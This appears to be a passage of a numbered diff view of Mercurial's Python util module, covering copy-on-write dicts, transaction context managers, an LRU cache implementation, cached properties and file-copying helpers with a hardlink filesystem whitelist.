1150 >>> b is b.preparewrite()
1156 >>> b is b.preparewrite()
1151 True
1157 True
1152 """
1158 """
1153
1159
1154 class cowsortdict(cow, sortdict):
1160 class cowsortdict(cow, sortdict):
1155 """copy-on-write sortdict
1161 """copy-on-write sortdict
1156
1162
1157 Be sure to call d = d.preparewrite() before writing to d.
1163 Be sure to call d = d.preparewrite() before writing to d.
1158 """
1164 """
1159
1165
1160 class transactional(object):
1166 class transactional(object):
1161 """Base class for making a transactional type into a context manager."""
1167 """Base class for making a transactional type into a context manager."""
1162 __metaclass__ = abc.ABCMeta
1168 __metaclass__ = abc.ABCMeta
1163
1169
1164 @abc.abstractmethod
1170 @abc.abstractmethod
1165 def close(self):
1171 def close(self):
1166 """Successfully closes the transaction."""
1172 """Successfully closes the transaction."""
1167
1173
1168 @abc.abstractmethod
1174 @abc.abstractmethod
1169 def release(self):
1175 def release(self):
1170 """Marks the end of the transaction.
1176 """Marks the end of the transaction.
1171
1177
1172 If the transaction has not been closed, it will be aborted.
1178 If the transaction has not been closed, it will be aborted.
1173 """
1179 """
1174
1180
1175 def __enter__(self):
1181 def __enter__(self):
1176 return self
1182 return self
1177
1183
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1179 try:
1185 try:
1180 if exc_type is None:
1186 if exc_type is None:
1181 self.close()
1187 self.close()
1182 finally:
1188 finally:
1183 self.release()
1189 self.release()
1184
1190
1185 @contextlib.contextmanager
1191 @contextlib.contextmanager
1186 def acceptintervention(tr=None):
1192 def acceptintervention(tr=None):
1187 """A context manager that closes the transaction on InterventionRequired
1193 """A context manager that closes the transaction on InterventionRequired
1188
1194
1189 If no transaction was provided, this simply runs the body and returns
1195 If no transaction was provided, this simply runs the body and returns
1190 """
1196 """
1191 if not tr:
1197 if not tr:
1192 yield
1198 yield
1193 return
1199 return
1194 try:
1200 try:
1195 yield
1201 yield
1196 tr.close()
1202 tr.close()
1197 except error.InterventionRequired:
1203 except error.InterventionRequired:
1198 tr.close()
1204 tr.close()
1199 raise
1205 raise
1200 finally:
1206 finally:
1201 tr.release()
1207 tr.release()
1202
1208
1203 @contextlib.contextmanager
1209 @contextlib.contextmanager
1204 def nullcontextmanager():
1210 def nullcontextmanager():
1205 yield
1211 yield
1206
1212
1207 class _lrucachenode(object):
1213 class _lrucachenode(object):
1208 """A node in a doubly linked list.
1214 """A node in a doubly linked list.
1209
1215
1210 Holds a reference to nodes on either side as well as a key-value
1216 Holds a reference to nodes on either side as well as a key-value
1211 pair for the dictionary entry.
1217 pair for the dictionary entry.
1212 """
1218 """
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1219 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214
1220
1215 def __init__(self):
1221 def __init__(self):
1216 self.next = None
1222 self.next = None
1217 self.prev = None
1223 self.prev = None
1218
1224
1219 self.key = _notset
1225 self.key = _notset
1220 self.value = None
1226 self.value = None
1221 self.cost = 0
1227 self.cost = 0
1222
1228
1223 def markempty(self):
1229 def markempty(self):
1224 """Mark the node as emptied."""
1230 """Mark the node as emptied."""
1225 self.key = _notset
1231 self.key = _notset
1226 self.value = None
1232 self.value = None
1227 self.cost = 0
1233 self.cost = 0
1228
1234
1229 class lrucachedict(object):
1235 class lrucachedict(object):
1230 """Dict that caches most recent accesses and sets.
1236 """Dict that caches most recent accesses and sets.
1231
1237
1232 The dict consists of an actual backing dict - indexed by original
1238 The dict consists of an actual backing dict - indexed by original
1233 key - and a doubly linked circular list defining the order of entries in
1239 key - and a doubly linked circular list defining the order of entries in
1234 the cache.
1240 the cache.
1235
1241
1236 The head node is the newest entry in the cache. If the cache is full,
1242 The head node is the newest entry in the cache. If the cache is full,
1237 we recycle head.prev and make it the new head. Cache accesses result in
1243 we recycle head.prev and make it the new head. Cache accesses result in
1238 the node being moved to before the existing head and being marked as the
1244 the node being moved to before the existing head and being marked as the
1239 new head node.
1245 new head node.
1240
1246
1241 Items in the cache can be inserted with an optional "cost" value. This is
1247 Items in the cache can be inserted with an optional "cost" value. This is
1242 simply an integer that is specified by the caller. The cache can be queried
1248 simply an integer that is specified by the caller. The cache can be queried
1243 for the total cost of all items presently in the cache.
1249 for the total cost of all items presently in the cache.
1244
1250
1245 The cache can also define a maximum cost. If a cache insertion would
1251 The cache can also define a maximum cost. If a cache insertion would
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1247 nodes will be evicted to make room for the new code. This can be used
1253 nodes will be evicted to make room for the new code. This can be used
1248 to e.g. set a max memory limit and associate an estimated bytes size
1254 to e.g. set a max memory limit and associate an estimated bytes size
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1250 """
1256 """
1251 def __init__(self, max, maxcost=0):
1257 def __init__(self, max, maxcost=0):
1252 self._cache = {}
1258 self._cache = {}
1253
1259
1254 self._head = head = _lrucachenode()
1260 self._head = head = _lrucachenode()
1255 head.prev = head
1261 head.prev = head
1256 head.next = head
1262 head.next = head
1257 self._size = 1
1263 self._size = 1
1258 self.capacity = max
1264 self.capacity = max
1259 self.totalcost = 0
1265 self.totalcost = 0
1260 self.maxcost = maxcost
1266 self.maxcost = maxcost
1261
1267
1262 def __len__(self):
1268 def __len__(self):
1263 return len(self._cache)
1269 return len(self._cache)
1264
1270
1265 def __contains__(self, k):
1271 def __contains__(self, k):
1266 return k in self._cache
1272 return k in self._cache
1267
1273
1268 def __iter__(self):
1274 def __iter__(self):
1269 # We don't have to iterate in cache order, but why not.
1275 # We don't have to iterate in cache order, but why not.
1270 n = self._head
1276 n = self._head
1271 for i in range(len(self._cache)):
1277 for i in range(len(self._cache)):
1272 yield n.key
1278 yield n.key
1273 n = n.next
1279 n = n.next
1274
1280
1275 def __getitem__(self, k):
1281 def __getitem__(self, k):
1276 node = self._cache[k]
1282 node = self._cache[k]
1277 self._movetohead(node)
1283 self._movetohead(node)
1278 return node.value
1284 return node.value
1279
1285
1280 def insert(self, k, v, cost=0):
1286 def insert(self, k, v, cost=0):
1281 """Insert a new item in the cache with optional cost value."""
1287 """Insert a new item in the cache with optional cost value."""
1282 node = self._cache.get(k)
1288 node = self._cache.get(k)
1283 # Replace existing value and mark as newest.
1289 # Replace existing value and mark as newest.
1284 if node is not None:
1290 if node is not None:
1285 self.totalcost -= node.cost
1291 self.totalcost -= node.cost
1286 node.value = v
1292 node.value = v
1287 node.cost = cost
1293 node.cost = cost
1288 self.totalcost += cost
1294 self.totalcost += cost
1289 self._movetohead(node)
1295 self._movetohead(node)
1290
1296
1291 if self.maxcost:
1297 if self.maxcost:
1292 self._enforcecostlimit()
1298 self._enforcecostlimit()
1293
1299
1294 return
1300 return
1295
1301
1296 if self._size < self.capacity:
1302 if self._size < self.capacity:
1297 node = self._addcapacity()
1303 node = self._addcapacity()
1298 else:
1304 else:
1299 # Grab the last/oldest item.
1305 # Grab the last/oldest item.
1300 node = self._head.prev
1306 node = self._head.prev
1301
1307
1302 # At capacity. Kill the old entry.
1308 # At capacity. Kill the old entry.
1303 if node.key is not _notset:
1309 if node.key is not _notset:
1304 self.totalcost -= node.cost
1310 self.totalcost -= node.cost
1305 del self._cache[node.key]
1311 del self._cache[node.key]
1306
1312
1307 node.key = k
1313 node.key = k
1308 node.value = v
1314 node.value = v
1309 node.cost = cost
1315 node.cost = cost
1310 self.totalcost += cost
1316 self.totalcost += cost
1311 self._cache[k] = node
1317 self._cache[k] = node
1312 # And mark it as newest entry. No need to adjust order since it
1318 # And mark it as newest entry. No need to adjust order since it
1313 # is already self._head.prev.
1319 # is already self._head.prev.
1314 self._head = node
1320 self._head = node
1315
1321
1316 if self.maxcost:
1322 if self.maxcost:
1317 self._enforcecostlimit()
1323 self._enforcecostlimit()
1318
1324
1319 def __setitem__(self, k, v):
1325 def __setitem__(self, k, v):
1320 self.insert(k, v)
1326 self.insert(k, v)
1321
1327
1322 def __delitem__(self, k):
1328 def __delitem__(self, k):
1323 self.pop(k)
1329 self.pop(k)
1324
1330
1325 def pop(self, k, default=_notset):
1331 def pop(self, k, default=_notset):
1326 try:
1332 try:
1327 node = self._cache.pop(k)
1333 node = self._cache.pop(k)
1328 except KeyError:
1334 except KeyError:
1329 if default is _notset:
1335 if default is _notset:
1330 raise
1336 raise
1331 return default
1337 return default
1332 value = node.value
1338 value = node.value
1333 self.totalcost -= node.cost
1339 self.totalcost -= node.cost
1334 node.markempty()
1340 node.markempty()
1335
1341
1336 # Temporarily mark as newest item before re-adjusting head to make
1342 # Temporarily mark as newest item before re-adjusting head to make
1337 # this node the oldest item.
1343 # this node the oldest item.
1338 self._movetohead(node)
1344 self._movetohead(node)
1339 self._head = node.next
1345 self._head = node.next
1340
1346
1341 return value
1347 return value
1342
1348
1343 # Additional dict methods.
1349 # Additional dict methods.
1344
1350
1345 def get(self, k, default=None):
1351 def get(self, k, default=None):
1346 try:
1352 try:
1347 return self.__getitem__(k)
1353 return self.__getitem__(k)
1348 except KeyError:
1354 except KeyError:
1349 return default
1355 return default
1350
1356
1351 def peek(self, k, default=_notset):
1357 def peek(self, k, default=_notset):
1352 """Get the specified item without moving it to the head
1358 """Get the specified item without moving it to the head
1353
1359
1354 Unlike get(), this doesn't mutate the internal state. But be aware
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1355 that it doesn't mean peek() is thread safe.
1361 that it doesn't mean peek() is thread safe.
1356 """
1362 """
1357 try:
1363 try:
1358 node = self._cache[k]
1364 node = self._cache[k]
1359 return node.value
1365 return node.value
1360 except KeyError:
1366 except KeyError:
1361 if default is _notset:
1367 if default is _notset:
1362 raise
1368 raise
1363 return default
1369 return default
1364
1370
1365 def clear(self):
1371 def clear(self):
1366 n = self._head
1372 n = self._head
1367 while n.key is not _notset:
1373 while n.key is not _notset:
1368 self.totalcost -= n.cost
1374 self.totalcost -= n.cost
1369 n.markempty()
1375 n.markempty()
1370 n = n.next
1376 n = n.next
1371
1377
1372 self._cache.clear()
1378 self._cache.clear()
1373
1379
1374 def copy(self, capacity=None, maxcost=0):
1380 def copy(self, capacity=None, maxcost=0):
1375 """Create a new cache as a copy of the current one.
1381 """Create a new cache as a copy of the current one.
1376
1382
1377 By default, the new cache has the same capacity as the existing one.
1383 By default, the new cache has the same capacity as the existing one.
1378 But, the cache capacity can be changed as part of performing the
1384 But, the cache capacity can be changed as part of performing the
1379 copy.
1385 copy.
1380
1386
1381 Items in the copy have an insertion/access order matching this
1387 Items in the copy have an insertion/access order matching this
1382 instance.
1388 instance.
1383 """
1389 """
1384
1390
1385 capacity = capacity or self.capacity
1391 capacity = capacity or self.capacity
1386 maxcost = maxcost or self.maxcost
1392 maxcost = maxcost or self.maxcost
1387 result = lrucachedict(capacity, maxcost=maxcost)
1393 result = lrucachedict(capacity, maxcost=maxcost)
1388
1394
1389 # We copy entries by iterating in oldest-to-newest order so the copy
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1390 # has the correct ordering.
1396 # has the correct ordering.
1391
1397
1392 # Find the first non-empty entry.
1398 # Find the first non-empty entry.
1393 n = self._head.prev
1399 n = self._head.prev
1394 while n.key is _notset and n is not self._head:
1400 while n.key is _notset and n is not self._head:
1395 n = n.prev
1401 n = n.prev
1396
1402
1397 # We could potentially skip the first N items when decreasing capacity.
1403 # We could potentially skip the first N items when decreasing capacity.
1398 # But let's keep it simple unless it is a performance problem.
1404 # But let's keep it simple unless it is a performance problem.
1399 for i in range(len(self._cache)):
1405 for i in range(len(self._cache)):
1400 result.insert(n.key, n.value, cost=n.cost)
1406 result.insert(n.key, n.value, cost=n.cost)
1401 n = n.prev
1407 n = n.prev
1402
1408
1403 return result
1409 return result
1404
1410
1405 def popoldest(self):
1411 def popoldest(self):
1406 """Remove the oldest item from the cache.
1412 """Remove the oldest item from the cache.
1407
1413
1408 Returns the (key, value) describing the removed cache entry.
1414 Returns the (key, value) describing the removed cache entry.
1409 """
1415 """
1410 if not self._cache:
1416 if not self._cache:
1411 return
1417 return
1412
1418
1413 # Walk the linked list backwards starting at tail node until we hit
1419 # Walk the linked list backwards starting at tail node until we hit
1414 # a non-empty node.
1420 # a non-empty node.
1415 n = self._head.prev
1421 n = self._head.prev
1416 while n.key is _notset:
1422 while n.key is _notset:
1417 n = n.prev
1423 n = n.prev
1418
1424
1419 key, value = n.key, n.value
1425 key, value = n.key, n.value
1420
1426
1421 # And remove it from the cache and mark it as empty.
1427 # And remove it from the cache and mark it as empty.
1422 del self._cache[n.key]
1428 del self._cache[n.key]
1423 self.totalcost -= n.cost
1429 self.totalcost -= n.cost
1424 n.markempty()
1430 n.markempty()
1425
1431
1426 return key, value
1432 return key, value
1427
1433
1428 def _movetohead(self, node):
1434 def _movetohead(self, node):
1429 """Mark a node as the newest, making it the new head.
1435 """Mark a node as the newest, making it the new head.
1430
1436
1431 When a node is accessed, it becomes the freshest entry in the LRU
1437 When a node is accessed, it becomes the freshest entry in the LRU
1432 list, which is denoted by self._head.
1438 list, which is denoted by self._head.
1433
1439
1434 Visually, let's make ``N`` the new head node (* denotes head):
1440 Visually, let's make ``N`` the new head node (* denotes head):
1435
1441
1436 previous/oldest <-> head <-> next/next newest
1442 previous/oldest <-> head <-> next/next newest
1437
1443
1438 ----<->--- A* ---<->-----
1444 ----<->--- A* ---<->-----
1439 | |
1445 | |
1440 E <-> D <-> N <-> C <-> B
1446 E <-> D <-> N <-> C <-> B
1441
1447
1442 To:
1448 To:
1443
1449
1444 ----<->--- N* ---<->-----
1450 ----<->--- N* ---<->-----
1445 | |
1451 | |
1446 E <-> D <-> C <-> B <-> A
1452 E <-> D <-> C <-> B <-> A
1447
1453
1448 This requires the following moves:
1454 This requires the following moves:
1449
1455
1450 C.next = D (node.prev.next = node.next)
1456 C.next = D (node.prev.next = node.next)
1451 D.prev = C (node.next.prev = node.prev)
1457 D.prev = C (node.next.prev = node.prev)
1452 E.next = N (head.prev.next = node)
1458 E.next = N (head.prev.next = node)
1453 N.prev = E (node.prev = head.prev)
1459 N.prev = E (node.prev = head.prev)
1454 N.next = A (node.next = head)
1460 N.next = A (node.next = head)
1455 A.prev = N (head.prev = node)
1461 A.prev = N (head.prev = node)
1456 """
1462 """
1457 head = self._head
1463 head = self._head
1458 # C.next = D
1464 # C.next = D
1459 node.prev.next = node.next
1465 node.prev.next = node.next
1460 # D.prev = C
1466 # D.prev = C
1461 node.next.prev = node.prev
1467 node.next.prev = node.prev
1462 # N.prev = E
1468 # N.prev = E
1463 node.prev = head.prev
1469 node.prev = head.prev
1464 # N.next = A
1470 # N.next = A
1465 # It is tempting to do just "head" here, however if node is
1471 # It is tempting to do just "head" here, however if node is
1466 # adjacent to head, this will do bad things.
1472 # adjacent to head, this will do bad things.
1467 node.next = head.prev.next
1473 node.next = head.prev.next
1468 # E.next = N
1474 # E.next = N
1469 node.next.prev = node
1475 node.next.prev = node
1470 # A.prev = N
1476 # A.prev = N
1471 node.prev.next = node
1477 node.prev.next = node
1472
1478
1473 self._head = node
1479 self._head = node
1474
1480
1475 def _addcapacity(self):
1481 def _addcapacity(self):
1476 """Add a node to the circular linked list.
1482 """Add a node to the circular linked list.
1477
1483
1478 The new node is inserted before the head node.
1484 The new node is inserted before the head node.
1479 """
1485 """
1480 head = self._head
1486 head = self._head
1481 node = _lrucachenode()
1487 node = _lrucachenode()
1482 head.prev.next = node
1488 head.prev.next = node
1483 node.prev = head.prev
1489 node.prev = head.prev
1484 node.next = head
1490 node.next = head
1485 head.prev = node
1491 head.prev = node
1486 self._size += 1
1492 self._size += 1
1487 return node
1493 return node
1488
1494
1489 def _enforcecostlimit(self):
1495 def _enforcecostlimit(self):
1490 # This should run after an insertion. It should only be called if total
1496 # This should run after an insertion. It should only be called if total
1491 # cost limits are being enforced.
1497 # cost limits are being enforced.
1492 # The most recently inserted node is never evicted.
1498 # The most recently inserted node is never evicted.
1493 if len(self) <= 1 or self.totalcost <= self.maxcost:
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1494 return
1500 return
1495
1501
1496 # This is logically equivalent to calling popoldest() until we
1502 # This is logically equivalent to calling popoldest() until we
1497 # free up enough cost. We don't do that since popoldest() needs
1503 # free up enough cost. We don't do that since popoldest() needs
1498 # to walk the linked list and doing this in a loop would be
1504 # to walk the linked list and doing this in a loop would be
1499 # quadratic. So we find the first non-empty node and then
1505 # quadratic. So we find the first non-empty node and then
1500 # walk nodes until we free up enough capacity.
1506 # walk nodes until we free up enough capacity.
1501 #
1507 #
1502 # If we only removed the minimum number of nodes to free enough
1508 # If we only removed the minimum number of nodes to free enough
1503 # cost at insert time, chances are high that the next insert would
1509 # cost at insert time, chances are high that the next insert would
1504 # also require pruning. This would effectively constitute quadratic
1510 # also require pruning. This would effectively constitute quadratic
1505 # behavior for insert-heavy workloads. To mitigate this, we set a
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1506 # target cost that is a percentage of the max cost. This will tend
1512 # target cost that is a percentage of the max cost. This will tend
1507 # to free more nodes when the high water mark is reached, which
1513 # to free more nodes when the high water mark is reached, which
1508 # lowers the chances of needing to prune on the subsequent insert.
1514 # lowers the chances of needing to prune on the subsequent insert.
1509 targetcost = int(self.maxcost * 0.75)
1515 targetcost = int(self.maxcost * 0.75)
1510
1516
1511 n = self._head.prev
1517 n = self._head.prev
1512 while n.key is _notset:
1518 while n.key is _notset:
1513 n = n.prev
1519 n = n.prev
1514
1520
1515 while len(self) > 1 and self.totalcost > targetcost:
1521 while len(self) > 1 and self.totalcost > targetcost:
1516 del self._cache[n.key]
1522 del self._cache[n.key]
1517 self.totalcost -= n.cost
1523 self.totalcost -= n.cost
1518 n.markempty()
1524 n.markempty()
1519 n = n.prev
1525 n = n.prev
1520
1526
1521 def lrucachefunc(func):
1527 def lrucachefunc(func):
1522 '''cache most recent results of function calls'''
1528 '''cache most recent results of function calls'''
1523 cache = {}
1529 cache = {}
1524 order = collections.deque()
1530 order = collections.deque()
1525 if func.__code__.co_argcount == 1:
1531 if func.__code__.co_argcount == 1:
1526 def f(arg):
1532 def f(arg):
1527 if arg not in cache:
1533 if arg not in cache:
1528 if len(cache) > 20:
1534 if len(cache) > 20:
1529 del cache[order.popleft()]
1535 del cache[order.popleft()]
1530 cache[arg] = func(arg)
1536 cache[arg] = func(arg)
1531 else:
1537 else:
1532 order.remove(arg)
1538 order.remove(arg)
1533 order.append(arg)
1539 order.append(arg)
1534 return cache[arg]
1540 return cache[arg]
1535 else:
1541 else:
1536 def f(*args):
1542 def f(*args):
1537 if args not in cache:
1543 if args not in cache:
1538 if len(cache) > 20:
1544 if len(cache) > 20:
1539 del cache[order.popleft()]
1545 del cache[order.popleft()]
1540 cache[args] = func(*args)
1546 cache[args] = func(*args)
1541 else:
1547 else:
1542 order.remove(args)
1548 order.remove(args)
1543 order.append(args)
1549 order.append(args)
1544 return cache[args]
1550 return cache[args]
1545
1551
1546 return f
1552 return f
1547
1553
1548 class propertycache(object):
1554 class propertycache(object):
1549 def __init__(self, func):
1555 def __init__(self, func):
1550 self.func = func
1556 self.func = func
1551 self.name = func.__name__
1557 self.name = func.__name__
1552 def __get__(self, obj, type=None):
1558 def __get__(self, obj, type=None):
1553 result = self.func(obj)
1559 result = self.func(obj)
1554 self.cachevalue(obj, result)
1560 self.cachevalue(obj, result)
1555 return result
1561 return result
1556
1562
1557 def cachevalue(self, obj, value):
1563 def cachevalue(self, obj, value):
1558 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1559 obj.__dict__[self.name] = value
1565 obj.__dict__[self.name] = value
1560
1566
1561 def clearcachedproperty(obj, prop):
1567 def clearcachedproperty(obj, prop):
1562 '''clear a cached property value, if one has been set'''
1568 '''clear a cached property value, if one has been set'''
1563 prop = pycompat.sysstr(prop)
1569 prop = pycompat.sysstr(prop)
1564 if prop in obj.__dict__:
1570 if prop in obj.__dict__:
1565 del obj.__dict__[prop]
1571 del obj.__dict__[prop]
1566
1572
1567 def increasingchunks(source, min=1024, max=65536):
1573 def increasingchunks(source, min=1024, max=65536):
1568 '''return no less than min bytes per chunk while data remains,
1574 '''return no less than min bytes per chunk while data remains,
1569 doubling min after each chunk until it reaches max'''
1575 doubling min after each chunk until it reaches max'''
1570 def log2(x):
1576 def log2(x):
1571 if not x:
1577 if not x:
1572 return 0
1578 return 0
1573 i = 0
1579 i = 0
1574 while x:
1580 while x:
1575 x >>= 1
1581 x >>= 1
1576 i += 1
1582 i += 1
1577 return i - 1
1583 return i - 1
1578
1584
1579 buf = []
1585 buf = []
1580 blen = 0
1586 blen = 0
1581 for chunk in source:
1587 for chunk in source:
1582 buf.append(chunk)
1588 buf.append(chunk)
1583 blen += len(chunk)
1589 blen += len(chunk)
1584 if blen >= min:
1590 if blen >= min:
1585 if min < max:
1591 if min < max:
1586 min = min << 1
1592 min = min << 1
1587 nmin = 1 << log2(blen)
1593 nmin = 1 << log2(blen)
1588 if nmin > min:
1594 if nmin > min:
1589 min = nmin
1595 min = nmin
1590 if min > max:
1596 if min > max:
1591 min = max
1597 min = max
1592 yield ''.join(buf)
1598 yield ''.join(buf)
1593 blen = 0
1599 blen = 0
1594 buf = []
1600 buf = []
1595 if buf:
1601 if buf:
1596 yield ''.join(buf)
1602 yield ''.join(buf)
1597
1603
1598 def always(fn):
1604 def always(fn):
1599 return True
1605 return True
1600
1606
1601 def never(fn):
1607 def never(fn):
1602 return False
1608 return False
1603
1609
1604 def nogc(func):
1610 def nogc(func):
1605 """disable garbage collector
1611 """disable garbage collector
1606
1612
1607 Python's garbage collector triggers a GC each time a certain number of
1613 Python's garbage collector triggers a GC each time a certain number of
1608 container objects (the number being defined by gc.get_threshold()) are
1614 container objects (the number being defined by gc.get_threshold()) are
1609 allocated even when marked not to be tracked by the collector. Tracking has
1615 allocated even when marked not to be tracked by the collector. Tracking has
1610 no effect on when GCs are triggered, only on what objects the GC looks
1616 no effect on when GCs are triggered, only on what objects the GC looks
1611 into. As a workaround, disable GC while building complex (huge)
1617 into. As a workaround, disable GC while building complex (huge)
1612 containers.
1618 containers.
1613
1619
1614 This garbage collector issue have been fixed in 2.7. But it still affect
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1615 CPython's performance.
1621 CPython's performance.
1616 """
1622 """
1617 def wrapper(*args, **kwargs):
1623 def wrapper(*args, **kwargs):
1618 gcenabled = gc.isenabled()
1624 gcenabled = gc.isenabled()
1619 gc.disable()
1625 gc.disable()
1620 try:
1626 try:
1621 return func(*args, **kwargs)
1627 return func(*args, **kwargs)
1622 finally:
1628 finally:
1623 if gcenabled:
1629 if gcenabled:
1624 gc.enable()
1630 gc.enable()
1625 return wrapper
1631 return wrapper
1626
1632
1627 if pycompat.ispypy:
1633 if pycompat.ispypy:
1628 # PyPy runs slower with gc disabled
1634 # PyPy runs slower with gc disabled
1629 nogc = lambda x: x
1635 nogc = lambda x: x
1630
1636
1631 def pathto(root, n1, n2):
1637 def pathto(root, n1, n2):
1632 '''return the relative path from one place to another.
1638 '''return the relative path from one place to another.
1633 root should use os.sep to separate directories
1639 root should use os.sep to separate directories
1634 n1 should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1635 n2 should use "/" to separate directories
1641 n2 should use "/" to separate directories
1636 returns an os.sep-separated path.
1642 returns an os.sep-separated path.
1637
1643
1638 If n1 is a relative path, it's assumed it's
1644 If n1 is a relative path, it's assumed it's
1639 relative to root.
1645 relative to root.
1640 n2 should always be relative to root.
1646 n2 should always be relative to root.
1641 '''
1647 '''
1642 if not n1:
1648 if not n1:
1643 return localpath(n2)
1649 return localpath(n2)
1644 if os.path.isabs(n1):
1650 if os.path.isabs(n1):
1645 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1646 return os.path.join(root, localpath(n2))
1652 return os.path.join(root, localpath(n2))
1647 n2 = '/'.join((pconvert(root), n2))
1653 n2 = '/'.join((pconvert(root), n2))
1648 a, b = splitpath(n1), n2.split('/')
1654 a, b = splitpath(n1), n2.split('/')
1649 a.reverse()
1655 a.reverse()
1650 b.reverse()
1656 b.reverse()
1651 while a and b and a[-1] == b[-1]:
1657 while a and b and a[-1] == b[-1]:
1652 a.pop()
1658 a.pop()
1653 b.pop()
1659 b.pop()
1654 b.reverse()
1660 b.reverse()
1655 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1656
1662
1657 # the location of data files matching the source code
1663 # the location of data files matching the source code
1658 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1659 # executable version (py2exe) doesn't support __file__
1665 # executable version (py2exe) doesn't support __file__
1660 datapath = os.path.dirname(pycompat.sysexecutable)
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1661 else:
1667 else:
1662 datapath = os.path.dirname(pycompat.fsencode(__file__))
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1663
1669
1664 i18n.setdatapath(datapath)
1670 i18n.setdatapath(datapath)
1665
1671
1666 def checksignature(func):
1672 def checksignature(func):
1667 '''wrap a function with code to check for calling errors'''
1673 '''wrap a function with code to check for calling errors'''
1668 def check(*args, **kwargs):
1674 def check(*args, **kwargs):
1669 try:
1675 try:
1670 return func(*args, **kwargs)
1676 return func(*args, **kwargs)
1671 except TypeError:
1677 except TypeError:
1672 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1673 raise error.SignatureError
1679 raise error.SignatureError
1674 raise
1680 raise
1675
1681
1676 return check
1682 return check
1677
1683
1678 # a whilelist of known filesystems where hardlink works reliably
1684 # a whilelist of known filesystems where hardlink works reliably
1679 _hardlinkfswhitelist = {
1685 _hardlinkfswhitelist = {
1680 'apfs',
1686 'apfs',
1681 'btrfs',
1687 'btrfs',
1682 'ext2',
1688 'ext2',
1683 'ext3',
1689 'ext3',
1684 'ext4',
1690 'ext4',
1685 'hfs',
1691 'hfs',
1686 'jfs',
1692 'jfs',
1687 'NTFS',
1693 'NTFS',
1688 'reiserfs',
1694 'reiserfs',
1689 'tmpfs',
1695 'tmpfs',
1690 'ufs',
1696 'ufs',
1691 'xfs',
1697 'xfs',
1692 'zfs',
1698 'zfs',
1693 }
1699 }
1694
1700
1695 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1696 '''copy a file, preserving mode and optionally other stat info like
1702 '''copy a file, preserving mode and optionally other stat info like
1697 atime/mtime
1703 atime/mtime
1698
1704
1699 checkambig argument is used with filestat, and is useful only if
1705 checkambig argument is used with filestat, and is useful only if
1700 destination file is guarded by any lock (e.g. repo.lock or
1706 destination file is guarded by any lock (e.g. repo.lock or
1701 repo.wlock).
1707 repo.wlock).
1702
1708
1703 copystat and checkambig should be exclusive.
1709 copystat and checkambig should be exclusive.
1704 '''
1710 '''
1705 assert not (copystat and checkambig)
1711 assert not (copystat and checkambig)
1706 oldstat = None
1712 oldstat = None
1707 if os.path.lexists(dest):
1713 if os.path.lexists(dest):
1708 if checkambig:
1714 if checkambig:
1709 oldstat = checkambig and filestat.frompath(dest)
1715 oldstat = checkambig and filestat.frompath(dest)
1710 unlink(dest)
1716 unlink(dest)
1711 if hardlink:
1717 if hardlink:
1712 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1713 # unless we are confident that dest is on a whitelisted filesystem.
1719 # unless we are confident that dest is on a whitelisted filesystem.
1714 try:
1720 try:
1715 fstype = getfstype(os.path.dirname(dest))
1721 fstype = getfstype(os.path.dirname(dest))
1716 except OSError:
1722 except OSError:
1717 fstype = None
1723 fstype = None
1718 if fstype not in _hardlinkfswhitelist:
1724 if fstype not in _hardlinkfswhitelist:
1719 hardlink = False
1725 hardlink = False
1720 if hardlink:
1726 if hardlink:
1721 try:
1727 try:
1722 oslink(src, dest)
1728 oslink(src, dest)
1723 return
1729 return
1724 except (IOError, OSError):
1730 except (IOError, OSError):
1725 pass # fall back to normal copy
1731 pass # fall back to normal copy
1726 if os.path.islink(src):
1732 if os.path.islink(src):
1727 os.symlink(os.readlink(src), dest)
1733 os.symlink(os.readlink(src), dest)
1728 # copytime is ignored for symlinks, but in general copytime isn't needed
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1729 # for them anyway
1735 # for them anyway
1730 else:
1736 else:
1731 try:
1737 try:
1732 shutil.copyfile(src, dest)
1738 shutil.copyfile(src, dest)
1733 if copystat:
1739 if copystat:
1734 # copystat also copies mode
1740 # copystat also copies mode
1735 shutil.copystat(src, dest)
1741 shutil.copystat(src, dest)
1736 else:
1742 else:
1737 shutil.copymode(src, dest)
1743 shutil.copymode(src, dest)
1738 if oldstat and oldstat.stat:
1744 if oldstat and oldstat.stat:
1739 newstat = filestat.frompath(dest)
1745 newstat = filestat.frompath(dest)
1740 if newstat.isambig(oldstat):
1746 if newstat.isambig(oldstat):
1741 # stat of copied file is ambiguous to original one
1747 # stat of copied file is ambiguous to original one
1742 advanced = (
1748 advanced = (
1743 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1744 os.utime(dest, (advanced, advanced))
1750 os.utime(dest, (advanced, advanced))
1745 except shutil.Error as inst:
1751 except shutil.Error as inst:
1746 raise error.Abort(str(inst))
1752 raise error.Abort(str(inst))
1747
1753
1748 def copyfiles(src, dst, hardlink=None, progress=None):
